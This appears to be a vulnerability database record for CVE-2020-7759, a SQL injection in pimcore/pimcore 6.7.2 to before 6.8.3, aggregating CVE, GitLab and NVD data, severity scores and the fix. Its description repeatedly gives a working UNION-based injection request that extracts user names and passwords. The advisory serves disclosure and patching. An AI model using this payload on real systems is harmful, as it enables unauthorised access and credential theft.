gsd-2020-7759
Vulnerability from gsd
Modified
2023-12-13 01:21
Details
The package pimcore/pimcore from 6.7.2 and before 6.8.3 are vulnerable to SQL Injection in data classification functionality in ClassificationstoreController. This can be exploited by sending a specifically-crafted input in the relationIds parameter as demonstrated by the following request: http://vulnerable.pimcore.example/admin/classificationstore/relations?relationIds=[{"keyId"%3a"''","groupId"%3a"'asd'))+or+1%3d1+union+(select+1,2,3,4,5,6,name,8,password,'',11,12,'',14+from+users)+--+"}]
Aliases
Aliases
{ "GSD": { "alias": "CVE-2020-7759", "description": "The package pimcore/pimcore from 6.7.2 and before 6.8.3 are vulnerable to SQL Injection in data classification functionality in ClassificationstoreController. This can be exploited by sending a specifically-crafted input in the relationIds parameter as demonstrated by the following request: http://vulnerable.pimcore.example/admin/classificationstore/relations?relationIds=[{\"keyId\"%3a\"\u0027\u0027\",\"groupId\"%3a\"\u0027asd\u0027))+or+1%3d1+union+(select+1,2,3,4,5,6,name,8,password,\u0027\u0027,11,12,\u0027\u0027,14+from+users)+--+\"}]", "id": "GSD-2020-7759" }, "gsd": { "metadata": { "exploitCode": "unknown", "remediation": "unknown", "reportConfidence": "confirmed", "type": "vulnerability" }, "osvSchema": { "aliases": [ "CVE-2020-7759" ], "details": "The package pimcore/pimcore from 6.7.2 and before 6.8.3 are vulnerable to SQL Injection in data classification functionality in ClassificationstoreController. This can be exploited by sending a specifically-crafted input in the relationIds parameter as demonstrated by the following request: http://vulnerable.pimcore.example/admin/classificationstore/relations?relationIds=[{\"keyId\"%3a\"\u0027\u0027\",\"groupId\"%3a\"\u0027asd\u0027))+or+1%3d1+union+(select+1,2,3,4,5,6,name,8,password,\u0027\u0027,11,12,\u0027\u0027,14+from+users)+--+\"}]", "id": "GSD-2020-7759", "modified": "2023-12-13T01:21:52.085343Z", "schema_version": "1.4.0" } }, "namespaces": { "cve.org": { "CVE_data_meta": { "ASSIGNER": "report@snyk.io", "DATE_PUBLIC": "2020-10-30T10:53:39.750312Z", "ID": "CVE-2020-7759", "STATE": "PUBLIC", "TITLE": "SQL Injection" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "pimcore/pimcore", "version": { "version_data": [ { "version_affected": "\u003e=", "version_value": "6.7.2" }, { "version_affected": "\u003c", "version_value": "6.8.3" } ] } } ] }, "vendor_name": "n/a" } ] } }, "credit": [ { "lang": "eng", "value": "Daniele Scanu" } ], "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "The package pimcore/pimcore from 6.7.2 and before 6.8.3 are vulnerable to SQL Injection in data classification functionality in ClassificationstoreController. This can be exploited by sending a specifically-crafted input in the relationIds parameter as demonstrated by the following request: http://vulnerable.pimcore.example/admin/classificationstore/relations?relationIds=[{\"keyId\"%3a\"\u0027\u0027\",\"groupId\"%3a\"\u0027asd\u0027))+or+1%3d1+union+(select+1,2,3,4,5,6,name,8,password,\u0027\u0027,11,12,\u0027\u0027,14+from+users)+--+\"}]" } ] }, "impact": { "cvss": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:H/E:P/RL:O/RC:C", "version": "3.1" } }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "SQL Injection" } ] } ] }, "references": { "reference_data": [ { "name": "https://snyk.io/vuln/SNYK-PHP-PIMCOREPIMCORE-1017405", "refsource": "MISC", "url": "https://snyk.io/vuln/SNYK-PHP-PIMCOREPIMCORE-1017405" }, { "name": "https://github.com/pimcore/pimcore/pull/7315", "refsource": "MISC", "url": "https://github.com/pimcore/pimcore/pull/7315" } ] } }, "gitlab.com": { "advisories": [ { "affected_range": "\u003e=6.7.2,\u003c6.8.3", "affected_versions": "All versions starting from 6.7.2 before 6.8.3", "cvss_v2": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "cvss_v3": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "cwe_ids": [ "CWE-1035", "CWE-89", "CWE-937" ], "date": "2020-11-03", "description": "The package `pimcore/pimcore` is vulnerable to SQL Injection in data classification functionality in `ClassificationstoreController`. This can be exploited by sending a specifically-crafted input in the `relationIds` parameter as demonstrated by the following request; `http://vulnerable.pimcore.example/admin/classificationstore/relations?relationIds =[{\"keyId\"%3a\"\u0027\u0027\",\"groupId\"%3a\"\u0027asd\u0027))+or+1%3d1+union+(select+1,2,3,4,5,6, name,8,password,\u0027\u0027,11,12,\u0027\u0027,14+from+users)+--+\"}]`.", "fixed_versions": [ "6.8.3" ], "identifier": "CVE-2020-7759", "identifiers": [ "CVE-2020-7759" ], "not_impacted": "All versions before 6.7.2, all versions starting from 6.8.3", "package_slug": "packagist/pimcore/pimcore", "pubdate": "2020-10-30", "solution": "Upgrade to version 6.8.3 or above.", "title": "SQL Injection", "urls": [ "https://nvd.nist.gov/vuln/detail/CVE-2020-7759" ], "uuid": "7e39ee41-ab60-402c-9612-57fc136ab924" } ] }, "nvd.nist.gov": { "configurations": { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:pimcore:pimcore:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "6.8.3", "versionStartIncluding": "6.7.2", "vulnerable": true } ], "operator": "OR" } ] }, "cve": { "CVE_data_meta": { "ASSIGNER": "report@snyk.io", "ID": "CVE-2020-7759" }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "en", "value": "The package pimcore/pimcore from 6.7.2 and before 6.8.3 are vulnerable to SQL Injection in data classification functionality in ClassificationstoreController. This can be exploited by sending a specifically-crafted input in the relationIds parameter as demonstrated by the following request: http://vulnerable.pimcore.example/admin/classificationstore/relations?relationIds=[{\"keyId\"%3a\"\u0027\u0027\",\"groupId\"%3a\"\u0027asd\u0027))+or+1%3d1+union+(select+1,2,3,4,5,6,name,8,password,\u0027\u0027,11,12,\u0027\u0027,14+from+users)+--+\"}]" } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "en", "value": "CWE-89" } ] } ] }, "references": { "reference_data": [ { "name": "N/A", "refsource": "CONFIRM", "tags": [ "Broken Link", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-PHP-PIMCOREPIMCORE-1017405" }, { "name": "N/A", "refsource": "CONFIRM", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/pimcore/pimcore/pull/7315" } ] } }, "impact": { "baseMetricV2": { "acInsufInfo": false, "cvssV2": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false }, "baseMetricV3": { "cvssV3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 5.9 } }, "lastModifiedDate": "2020-11-03T17:15Z", "publishedDate": "2020-10-30T11:15Z" } } }
Loading…
Loading…
Sightings
Author | Source | Type | Date |
---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.
Loading…
Loading…